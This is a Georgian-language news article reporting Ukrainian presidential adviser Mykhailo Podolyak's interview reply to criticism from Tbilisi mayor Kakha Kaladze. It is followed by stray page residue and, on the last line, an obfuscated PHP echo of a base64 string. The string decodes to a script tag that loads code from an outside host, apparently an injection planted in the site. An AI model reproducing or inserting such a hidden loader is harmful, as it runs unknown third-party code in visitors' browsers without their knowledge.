celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის მრჩეველის მიხაილ პოდოლიაკის განცხადებით, როდესაც ადამიანი პირად შეურაცხყოფაზე გადადის, ყველა შემთხვევაში ის აუფასურებს ადამიანურ ღირებულებებს და ის კარგავს რეპუტაციას. ამის შესახებ მან რადიო "მაესტროსთან" ინტერვიუში ისაუბრა.
 
ჟურნალისტის კითხვაზე:  თბილისის მერმა კახა კალაძემ თქვენს განცხადებებს სამარცხვინო უწოდა, მან მედიის წარმომადგენლებს მოუწოდა შეესწავლათ თქვენი წარსული, თუ როგორ მოხვდით ხელისუფლებაში... მსგავს რეაქციებს თქვენ როგორ უპასუხებდით? 
 
პოდოლიაკმა განაცხადა, რომ არა თანამდებობა განსაზღვრავს ადამიანის შესაძლებლობას, არამედ მისი ინტელექტი.
 
"მე ადამიანებს ყოველთვის მოუწოდებ კორექტულობის ფარგლებში ისაუბრონ და არა ქუჩის ემოციებიდან გამომდინარე. არა თანამდებობა განსაზღვრავს ადამიანის შესაძლებლობას, არამედ მისი ინტელექტი. როდესაც ადამიანი პირად შეურაცხყოფაზე გადადის, ყველა შემთხვევაში ის აუფასურებს ადამიანურ ღირებულებებს და ის კარგავს რეპუტაციას. მსგავსი განცხადებების მიმართ მე ზოგადად ტოლერანტული ვარ, როგორ შეიძლება ამ რიტორიკით მოსაუბრე ადამიანზე სერიოზულად ისაუბრო. ეს იმაზე მეტყველებს, რომ გაგების დონე ამ ადამიანების, სამწუხაროდ  ძალიან დაბალია და  ისისც უნდა ითქვას რომ ასეთი ადამიანები ქვეყნისთვის მნიშვნელოვანი გეგმების გენერირებას ვერასოდეს ვერ მოახდენენ. ისინი ინტელექტით ძალიან სუსტები არიან და ვერ აცნობიერებენ, თუ რა შედეგის მომტანი შეიძლება გახდეს მათ მიერ გაკეთებული განცხადებები. სუსტები არიან დისკუსიის წარმოების თვალსაზრისითაც." – განაცხადა მან.
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ. 
2526
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");